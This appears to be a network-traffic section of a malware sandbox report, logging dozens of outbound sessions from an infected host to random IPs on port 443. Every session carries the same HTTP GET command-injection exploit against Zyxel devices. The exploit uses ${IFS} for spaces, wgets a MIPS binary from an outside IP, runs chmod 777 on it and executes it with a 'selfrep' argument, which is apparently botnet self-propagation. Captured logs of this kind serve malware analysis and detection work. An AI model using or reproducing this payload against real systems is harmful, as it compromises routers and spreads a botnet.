                                                Jan 12, 2024 18:24:25.592495918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1841192.168.2.134441049.170.231.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592545033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1842192.168.2.1343330194.41.117.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592571974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1843192.168.2.135215651.244.17.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592632055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1844192.168.2.1337436163.116.216.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592649937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1845192.168.2.1352232105.233.223.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592677116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1846192.168.2.134008454.37.203.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592715979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1847192.168.2.134268417.31.233.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592753887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1848192.168.2.1350584125.3.148.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592776060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1849192.168.2.1347138142.138.59.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592823029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1850192.168.2.13538702.18.66.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592855930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1851192.168.2.133464075.77.202.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592899084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1852192.168.2.134393489.20.186.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592938900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1853192.168.2.1359900104.129.216.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592978954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1854192.168.2.13555388.93.221.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593014956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1855192.168.2.1355572185.175.241.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593050957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1856192.168.2.1352196117.30.92.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593079090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1857192.168.2.1345506158.74.227.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593132973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1858192.168.2.1355632113.190.87.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593162060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1859192.168.2.1339318159.87.205.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593188047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1860192.168.2.134439853.173.129.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593228102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1861192.168.2.1348042171.85.94.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593260050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1862192.168.2.1345100107.76.228.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593296051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1863192.168.2.133910258.3.2.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593364000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1864192.168.2.134952458.0.136.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593405008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1865192.168.2.1351992163.211.120.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593425989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1866192.168.2.1344584212.245.3.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593461037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1867192.168.2.134484094.124.170.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593497038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1868192.168.2.1335972185.60.77.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593553066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1869192.168.2.135599894.176.64.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593585014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1870192.168.2.135327465.157.52.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593620062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1871192.168.2.13574409.47.213.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593658924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1872192.168.2.1349986119.95.135.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593697071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1873192.168.2.1341444144.226.8.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593738079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1874192.168.2.1339406206.65.216.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593766928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1875192.168.2.136057094.251.195.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593822956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1876192.168.2.1348970120.94.221.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593864918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1877192.168.2.1335078107.97.63.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593893051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1878192.168.2.133673474.30.152.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593925953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1879192.168.2.1352800220.181.163.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.593985081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1880192.168.2.1351390120.162.28.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594023943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1881192.168.2.133769460.15.128.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594059944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1882192.168.2.1347744135.11.239.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594106913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1883192.168.2.1334382104.179.128.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594158888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1884192.168.2.1350256164.227.54.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594211102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1885192.168.2.13525109.255.149.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594228029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1886192.168.2.1333194156.200.3.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594300985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1887192.168.2.133616835.21.111.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594336987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1888192.168.2.1354538171.171.95.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594381094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1889192.168.2.1343172151.61.64.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594423056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1890192.168.2.1355452160.182.176.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594465971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1891192.168.2.135051492.74.192.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594506979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1892192.168.2.135044639.155.239.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594552994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1893192.168.2.135088020.209.199.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594592094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1894192.168.2.1359154213.20.117.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594633102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1895192.168.2.1350472210.10.176.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594681025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1896192.168.2.1340200144.132.146.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594731092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1897192.168.2.1338618171.34.22.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594769955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1898192.168.2.1333164160.250.253.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594799995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1899192.168.2.1357450193.71.149.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594854116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1900192.168.2.1335196130.168.97.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594880104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1901192.168.2.135631023.143.24.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594916105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1902192.168.2.1360598157.61.83.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.594942093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1903192.168.2.13515789.44.209.40443
                                                TimestampBytes transferredDirectionData
